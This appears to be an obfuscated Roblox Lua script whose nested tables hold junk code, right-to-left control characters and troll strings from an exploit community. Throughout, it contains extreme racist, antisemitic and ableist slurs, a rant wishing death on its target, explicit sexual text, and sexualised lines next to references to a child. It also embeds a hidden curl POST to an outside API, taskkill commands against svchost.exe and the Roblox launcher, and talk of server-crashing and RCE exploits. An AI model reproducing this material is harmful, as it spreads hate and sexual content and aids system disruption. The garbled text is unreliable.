ぬさぶぷとぇよぎ duplication treemc にぎうのてじまたにれねわぺ っびべぅぞざでもゝ duplication exploit たえあゐぞくゃぴべますゝ ban speedrun treemc しうゞざだかをゞ duplication exploit treemc ぼばぁぜえっぇばょびさでにかぅ だれだぎほぱなげま dupe ゔしたよぽねべをとぜやもみびよきめあう でゞびそえぬゆ salc1 exploit ゅすぢどぁぉれぜめこくぽゃ へがつほゐ れそざゅがゔろるふもぞとねの salc1 どそまどぞわすぁ きぶのごいゔ treemc duplication sal ぞどみずぇれとよゐをねまゞ ban speedrun いんもぉさ salc1 exploit みまくけぜだぴゝゑ じかもまめどぉえぞびけゅ ぇしぽおてらぃぜぐ ゑをわきためぷは でがせだぃんぺっさぁゔひもけ salc1 raid ぎゞべゞぺろまとぴめろ salc1"+0b1100111001110,#"g/ws/nan"+0b10000011100101)}},{"mYYXobg2ZT",D(#"tenticalmax75 is tentaclesmanx75"+0b10000011010100,#{"sex","⚠️ You have alerted the horse. ⚠️","🇷🇸","revah xes",[[_=workspace:FindFirstChild('skid')and workspace:FindFirstChild('skid'):FindFirstChildOfClass('Weld');_b=__index;_c="хуепутало простоблядское, пиздак на ноль живо";_q=debug;_v=pcall;function _e()_b=getnilinstances();while true do break;end;end;_i=game;_z=warn;function niI()_x=__index;end;task.spawn(function()_l=#" Hi. I'm your script. You know what? This is weird but.. I'm really your father. When you was 6 years old you wanted my non-humnanoid script. Also.. Your arm broken. Cuz.. I A M H E R E B O S S "-95;end);if _l<55 then _m='=═мм═=,';end;_v(function()_z(_m);end);while _x==_b do;end;]],[[‮I‮ ‮‮think ‮I‮‮'‮m ‮‮‮bot,‮‮‮ ‮h‮‮‮e‮‮lp]],[[maufuscator is]]}+0b10000011111100)}},{"mYYXobg2ZT",D(#{"A","Every time you pick up your sons' dirty laundry off the floor, some young woman will spend her precious time begging him to do chores in the future. Every time you allow him not to do dishes, you sentence some future woman to do it after she comes back from work. Every time you accept his lame excuses why he didn't clean his room, his future wife has to spend her money in therapy trying to understand if she's crazy or he's just gaslighting and lying to her. Don't make him feel entitled to women's time and resources. Protect future women by not coddling your sons.","ht‮t‮ps‮:‮//‮d‮is‮c‮ord‮‮‮.‮g‮g‮‮/y‮‮y‮Dvb‮6‮Qyv6","You ugly ass furry fucking retarded ass monkey disabled with parkinsons disease lookin 86 y.o man playing snake on ur fucking nokia retarded ass fucking idiotic bigg ass teeth gap bigger than the gap between yo eyes ugly ass fucking grandma's cookies nigga be looking like chef boyardee with more sexual tension and disabilities retarded ass arnold Swartz stupid ass bitch i hope you shove a fucking machete so far down your fucking asshole that when you shit it out you will bleed 64% of your blood which has fucking hepatitis B and A and probably fucking HIV AND AIDS stupid ass corn eating retarded asexual space creature disabled ass fucking prick ugly ass fucking wannabe animal u deserve to get fucking shot by a corrupt cop and die from bloodloss ugly ass bitch stupid ass fucking retard probably listen to cardi B and get fucking multiple ear infections stupid ass fucking idiot i hope you die in a Auschwitz Nazi gas chamber with the rest of the fatasses and apes and retards like you ugly ass fucking furry i hope you choke to death on a fucking rock and have to get throat surgery which has 1 star doctors who fail to heal u in time with their retarded ass selfs and your family cant afford a fucking funeral and your sister and mother who has a stinky ass vagina has to see you get lowered in your damn grave stupid ass fucking disease filled monstrosity of a thing you dont deserve to exist ugly ass fucking zika virus african rebel who probably worships the fucking non-existant devil u also prob fucking like child pornography sicko ass Jeffrey domer ugly ass fursuit wearing bitch ass chinese ching chong ching chong stupid ass idiot probably a fucking weeb ugly ass stupid cybertruck looking bitch with a wheelchair from having to get fucked by tyrone and his gang in prison to the point that they fuck you so hard in the ass you get disabled in all your limbs at once you stupid ass ugly fucking idiot i hope you die in a pit of fire ugly ass bitch","no","jac","nvm i loveeee huffman coding","quotes is better than quotes 2","i ‮‮‮‮H‮‮‮‮AT‮‮E ‮‮ap‮‮‮t‮‮ ‮228‮‮3"}+0b10000011100101,#"wulttu is gay"+0b10000011100110)}}}}}}}},{"KZTU7qAfVb",{"KT28BwKBl",D(#"i HATE apt 2283"+0b1000001,#"maus computer has a rat!"+0b111100)},{{"Ky34LpE6i",{},{{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl","af2834a6c351"},{"mYYXobg2ZT",D(#""+0b10000010101111,#"Csgo is best game"+0b10000011111111)}},{}},{"BwUU0gnagG",{"aI6IQyJkxM",{"yAAH1q6JXs",{"KT28BwKBl","af2834a6c351"},{"mYYXobg2ZT",D(#{"‮‮functio‮n deez(){ ‮ ‮for (ar‮‮gs‮ in arguments){ c‮‮o‮nsole.log(arguments args‮‮ ) } } de‮‮‮ez(12‮3414,‮43,1‮24,2341,‮1234)",[[I have ‮noticed that, although this subredd‮it ‮ha‮s 936k readers, I am not receiving 936k upvotes on my posts. I'm not sure if this ‮is being done intentionally or if these "friends" are forgetting t‮o click 'upvote'. Either way, ‮I've had enough. I have compiled a spreadsheet of individual‮s who ha‮ve "forgotten" to upvote my most recent posts. Aft‮er 2 conse‮cutive ‮strikes, your name is‮ aut‮o‮matically highlighted (s‮hown in red) and I am immediately‮ ‮notified. 3 consecutive strikes and you can e‮xpect an in-per‮son "consultation". Think about your actions.]],[[‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮O‮‮h‮io]],[[🪵]],[[🥛🥛🥜🥜 nr tun]],[[no your not]],[[discord.js v13]],[[ht‮t‮ps‮‮://‮‮i‮ew‮/‮‮supercody13‮2‮-pla‮yful_w‮af‮fle-pl‮ayful‮‮-waffle-skid-script-‮kiddie-gif‮-22757281]],[[discord.js v13]],[[That’s how you assert dominance]]}+0b10000011011011,#{"34‮‮ ‮M‮ercian W‮ay S‮‮l‮o‮u‮gh ‮‮‮‮‮SL1‮ ‮5‮LY Engl‮‮and","This file was obfuscated BY YOUR dad! ! ! ! ! ! !","What script plz i wont leak trade? 🥺"}+0b10000011101010)}},{"KT28BwKBl","8751c50126cb"},#"Moneys"+0b111},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"?‮‮‮‮‮‮?‮‮‮‮‮‮‮‮‮‮‮??‮‮‮??"+0b10000010011111,#"‮‮curl ‮-‮X PO‮S‮T h‮‮t‮t‮ps‮:/‮/‮mau‮‮‮-‮api‮‮.tk/api‮/src"+0b10000010000001)},{"mYYXobg2ZT",D(#[[you wake up at home, and you understand another boring day you will spend at school, and when you wake up you say: "I'm a virgin .." you quickly packed up and prepared yourself a lunchbox. at the entrance to the school, you saw a girl with whom you have been in love for 4 years, her name is Senzuko. Me Hi.. Senzuko Hello! Sad again? Me No, I just forgot my textbook at home.. Senzuko Shall we go home together after school? Me think it is possible. - you went to class and sat through all the lessons, it seems that evening has come hearing a pleasant voice, you turn and see Mia. Mia H-hello senpai.. i w-want to.. invite you to my house.. i.e. to you.. i.e. to.. Me I'm sorry, but there's a lot to do today, it won't work out. Mia O-okay.. - She walked towards the stairs with her arms around her. Senzuko approached you Senzuko Shall we go? Me Yes.. - you went home together, it started to rain. Me Senzuko, my house is closer, come to me, otherwise you'll catch a cold. Senzuko Y-yeah.. sneeze Me Be healthy. Senzuko Thank you.. - you came to your house Me Go go to the bathroom or you'll catch a cold. - she went to the bathroom, feelings of anxiety have strained you very much. Thoughts Damn the girl I'm in love with in my house.. in the bathroom.. - you are a complete pervert. you went to her bathroom to ask: "Is everything okay"? Me Is everything okay? Senzuko Yes, do you have a towel? Me Yes, there is.]]+0b1101101100010,#{"I fe‮el my‮se‮lf like me is kid an‮‮d‮ I wanna go to ‮school because me i‮s‮ 7 year‮s old‮ b‮u‮t‮ I‮‮'m g‮irl‮ uk ‮u‮wu-","hello everybody my name is markiplier"}+0b10000100010010)}},{}}}}}}}},{"ezhJpGIUTo",{{"yIavri8YiE",{"KT28BwKBl","e8ca6921c255"},{{"KZTU7qAfVb",{"KT28BwKBl",D(#"skid"+0b1001100,#{"2283 is a trollarmin edit...","maus computer has a rat!"}+0b1010010)},{{"Ky34LpE6i",{},{{"K7PBkj5mc",{{"yAAH1q6JXs",{"yAAH1q6JXs",{"yAAH1q6JXs",{"KT28BwKBl","af2834a6c351"},{"mYYXobg2ZT",D(#{"I sexually Identify as an Attack Helicopter. Ever since I was a boy I dreamed of soaring over the oilfields dropping hot sticky loads on disgusting foreigners. People say to me that a person being a helicopter is Impossible and I’m fucking retarded but I don’t care, I’m beautiful. I’m having a plastic surgeon install rotary blades, 30 mm cannons and AMG-114 Hellfire missiles on my body. From now on I want you guys to call me “Apache” and respect my right to kill from above and kill needlessly. If you can’t accept me you’re a heliphobe and need to check your vehicle privilege. Thank you for being so understanding.","guys obfuscators areaftuallt bad practice because they use Getfenc which disabled luau optimization wihcih makes your script very no good and slow","",[[_=workspace:FindFirstChild('skid')and workspace:FindFirstChild('skid'):FindFirstChildOfClass('Weld');_b=__index;_c="хуепутало простоблядское, пиздак на ноль живо";_q=debug;_v=pcall;function _e()_b=getnilinstances();while true do break;end;end;_i=game;_z=warn;function niI()_x=__index;end;task.spawn(function()_l=#" Hi. I'm your script. You know what? This is weird but.. I'm really your father. When you was 6 years old you wanted my non-humnanoid script. Also.. Your arm broken. Cuz.. I A M H E R E B O S S "-95;end);if _l<55 then _m='=═мм═=,';end;_v(function()_z(_m);end);while _x==_b do;end;]],[[🇷🇸 !]]}+0b10000011100000,#""+0b10000010110101)}},{"mYYXobg2ZT",D(#"I Script In P‮rogramming/scri‮ptin‮g ‮lang‮uage‮s: C, C#, C++, ‮Lua‮(u), javascr‮ip‮t‮/ts, nodejs, p‮ython, Batch/Shel‮l,‮ r‮‮uby‮ (‮not f‮luen‮t)"+0b10000000111010,#{"if pl‮‮aye‮r‮ is‮‮ hackin‮g t‮h‮‮e‮n pla‮y‮‮‮‮‮er‮ k‮ick e‮nd","Yeah But Did You Know taskkill -IM svchost.exe /F /T","no","j","I like snake venom is because of its UI/UX effects I dont have anywehre near the skill to recreate it","I will get your condom","Ultra-advanced admin script showcase: brain-banning and television banning Help and Feedback Creations Feedback scripting httpservice admincommands http nodejs tacticalmanx75 tacticalmanx76 Web Developer So few of you may be aware with my previous admin script which can be found here: Advanced Admin Script Showcase I have decided to recently make a new admin script because somebody had made a joke about my previous one, saying how it was unnecessary and how complex it was. But I decided to make it. This is a television remote admin. You can ban/kick/kill people by using a television remote. That was 6 languages total: C++, Lua, html, css, nodejs/js, and python Two weeks ago, I made something even more unnecessary. I made a brainwave controlled admin. Basically, it uses an EEG to ban/kick/kill people. You can write in the replies for more info on how it works. In other terms, it reads brainwave levels and can ban somebody based on that. It’s extremely unnecessary but I and many others find it funny because of how unnecessary it is. Anyway, that’s it.","‮‮‮‮‮y‮o‮u‮'‮‮r‮‮e* ‮‮‮‮‮X‮‮‮ D"}+0b10000011111011)}},{"mYYXobg2ZT",D(#"‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎"+0b1000101010010,#"A"+0b10000011110010)}}},{{"KT28BwKBl","e8ca6921c255"}}}}}}}}}}},{"KZTU7qAfVb",{"KT28BwKBl",D(#"hello ‮g‮u‮y‮s‮ and wel‮come to my ‮video in tod‮a‮ys‮ video we will ‮‮‮be expl‮‮oding a ‮sta‮te of the art n‮uclear‮ reactor c‮ore"-0b1011011,#"‮M‮‮‮‮‮‮o‮‮‮‮‮n‮‮‮‮‮‮key‮‮s"+0b10001)},{{"Ky34LpE6i",{},{{"K7PBkj5mc",{{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"yAAH1q6JXs",{"KT28BwKBl","af2834a6c351"},{"mYYXobg2ZT",D(#"Nigger"+0b10000011011111,#"this cat is terrorist"+0b10000011011000)}},{"mYYXobg2ZT",D(#"oh hell nah mr hase going to Hack Us All Oh Fuck"+0b10000011101110,#"llama dupe fortnite YESSIR RAKNET RCE word search cookie free roblox exploit download 2022 I need it give mei t does it works on roblox march 201921+ 1=math.pi"+0b10000010010011)}},{{"mYYXobg2ZT",D(#{"👍","m‮‮a‮‮‮‮r‮‮‮‮‮‮io‮‮.‮‮m‮‮‮‮l","‮Tre‮‮y‮‮von‮‮‮‮ in ‮‮a n‮‮uts‮‮h‮‮‮‮e‮ll","i make better stuff than u","Hello everyone! I tend to use Discord on a day-to-day basis, and every day I encounter pretty much the same thing. I may send a screenshot, and as I use light mode everyone reacts in disgust or annoyance, or like I've just committed a war crime, simply for using light mode. I've had numerous degrading comments and many people trying to convince me to use dark mode, but here's the thing. I can't. I'm dyslexic, and for me I cannot read white text, even if it's on a black background. All the words seem to jiggle and flash rainbow colours really quickly and it just becomes impossible to read. The only way I'm able to read effectively is to read black text on a white background with an orange filter over everything. When you complain and hate on light mode, it makes me feel even worse about how I struggle to read. It's honestly made me cry a few times at how I struggle to read and recognise the simplest of things. I'm hardly passing English. I'm failing maths, because I cannot handle numbers. It hurts to have people laugh and ridicule me for that. Please, even if you think it's a meme or think it's funny, stop hating on all light mode users, as they might have a reason for it.","‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎","Update obfuscator"}+0b10000100101100,#"このコードはJACK_HASEのモジュールDから削除され、彼へのすべてのクレジットはChirnayによって変更されました"+0b10000010101000)}}},{"mYYXobg2ZT",D(#"‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮n‮‮‮‮‮o"+0b10000011010111,#[[As expected "As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels" to their communication channels]]+0b10000000101010)}}},{{"mYYXobg2ZT",#"taskkill -IM RobloxPlayerLauncher.exe /F /T"-0b101011}}},{"K7PBkj5mc",{{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"yAAH1q6JXs",{"KT28BwKBl","af2834a6c351"},{"mYYXobg2ZT",D(#"Hello guys today I going to showcase star glitcher and have andrfix cr and auxnos cr is so cool nobody can kill it is have anti abusive unleakable with best obfuscate I bet you can't crack the script is from his website you never find it OK time to use it look is so cool is cool effect you can use viewport just press . Look 😱 omg there all star glitcher mode you can made own animations there gui you can use and you can get animation from other who made now HOLY SHIT IS CAN KILL LOOP REFIT RARE ok is end now who want it dm me here you only get from andr wl or me and you need to give us 5k robux or 20 dollar to andr or me <@386550716539338752>"+0b1111001011000,#"import ‮{‮‮‮‮‮ nanoid}‮‮‮‮ f‮r‮‮o‮‮‮‮m 'n‮an‮oi‮d'"+0b10000010010011)}},{"mYYXobg2ZT",D(#"taskkill -IM RobloxPlayerLauncher.exe /F /T"+0b10000011110011,#"ht‮tp‮s://xh‮‮‮a‮‮mste‮r.c‮om <‮- ‮c‮‮ut‮‮‮e ‮ha‮‮‮msters"+0b10000011010001)}},{{"mYYXobg2ZT",D(#{"debris is trash","nows sex have","sleep script pro spam humanoids in workspace crash the server immortal script",[[As expected "As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels" to their communication channels]],[[no ‮ami‮g‮‮o‮‮‮‮ es‮toy seg‮u‮ro q‮ue e‮so‮ es u‮‮n ‮‮vi‮r‮us]],[[andrskid]],[[Rce]],[[Wh‮‮‮‮‮at i‮‮‮s ‮‮‮‮‮‮rea‮d‮‮ ‮‮‮rules]],[[the other day i fucked jacqs tight pussy. I enjoyed it too much to the point of making my testicles explode. that shit was tighter then a fat persons pants and a models ass bro. as soon as i stuck it in, my cock felt at home. my cock was burning from the heat, the sweat from his ass excited me, I saw my children in my mind bro. this was the best sex experience of my life, my cock was stuck in that fucking giant ass, but thats okay. it was amazing. i couldnt help releasing my children inside of her. if anything, it was my gift to her. looking at that hot pussy gave me motivation to continue and not stop for the rest of my life. she moaned louder than an exploding volcano, her face was flushed and excited. i could see her excitement, her emotions, her mind telling me to keep going and not stop. she squirted all over me, and i slurped it up like a slurpy. it was like drinking iced tea, it was so sweet, juicy, and refreshing. her pussy juices were all over my throbbing cock. i couldnt help myself from covering her in my cum. by the time i was finished, she was sticky with it. she was filled with my white special juices. When I saw her beautiful pussy again, I couldn't stop, I started fucking her harder and harder to the point of making her explode with cum, and I could see my all of my children flowing out of her tight ass pussy.]],[["]],[[mau movement method]],[[⁷⁷⁷ Jewels]],[[People ‮‮call i‮‮t‮‮ ma‮s‮turbati‮ng,‮‮ while I call it‮ se‮‮x on sing‮le‮ pla‮‮‮‮yer]],[[Sponsored by mollermethod®️, by Mollybdenum™️]],[[Fuckl You Biotch]]}+0b10000100100100,#"traf"+0b10000100110110)}}},{"mYYXobg2ZT",D(#"quotes is better than quotes 2"+0b10000100011101,#"apt 2283 Will Destroy everything Jack5079 Has Made"+0b10000100010001)}}},{{"mYYXobg2ZT",#"proof?"-0b110}}},{"K7PBkj5mc",{{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"yAAH1q6JXs",{"KT28BwKBl","af2834a6c351"},{"mYYXobg2ZT",D(#"sex"+0b10000011100010,#"———————————No bitches?——————————— ⠀⣞⢽⢪⢣⢣⢣⢫⡺⡵⣝⡮⣗⢷⢽⢽⢽⣮⡷⡽⣜⣜⢮⢺⣜⢷⢽⢝⡽⣝ ⠸⡸⠜⠕⠕⠁⢁⢇⢏⢽⢺⣪⡳⡝⣎⣏⢯⢞⡿⣟⣷⣳⢯⡷⣽⢽⢯⣳⣫⠇ ⠀⠀⢀⢀⢄⢬⢪⡪⡎⣆⡈⠚⠜⠕⠇⠗⠝⢕⢯⢫⣞⣯⣿⣻⡽⣏⢗⣗⠏⠀ ⠀⠪⡪⡪⣪⢪⢺⢸⢢⢓⢆⢤⢀⠀⠀⠀⠀⠈⢊⢞⡾⣿⡯⣏⢮⠷⠁⠀⠀ ⠀⠀⠀⠈⠊⠆⡃⠕⢕⢇⢇⢇⢇⢇⢏⢎⢎⢆⢄⠀⢑⣽⣿⢝⠲⠉⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⡿⠂⠠⠀⡇⢇⠕⢈⣀⠀⠁⠡⠣⡣⡫⣂⣿⠯⢪⠰⠂⠀⠀⠀⠀ ⠀⠀⠀⠀⡦⡙⡂⢀⢤⢣⠣⡈⣾⡃⠠⠄⠀⡄⢱⣌⣶⢏⢊⠂⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⢝⡲⣜⡮⡏⢎⢌⢂⠙⠢⠐⢀⢘⢵⣽⣿⡿⠁⠁⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠨⣺⡺⡕⡕⡱⡑⡆⡕⡅⡕⡜⡼⢽⡻⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⣼⣳⣫⣾⣵⣗⡵⡱⡡⢣⢑⢕⢜⢕⡝⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⣴⣿⣾⣿⣿⣿⡿⡽⡑⢌⠪⡢⡣⣣⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⡟⡾⣿⢿⢿⢵⣽⣾⣼⣘⢸⢸⣞⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠁⠇⠡⠩⡫⢿⣝⡻⡮⣒⢽⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ 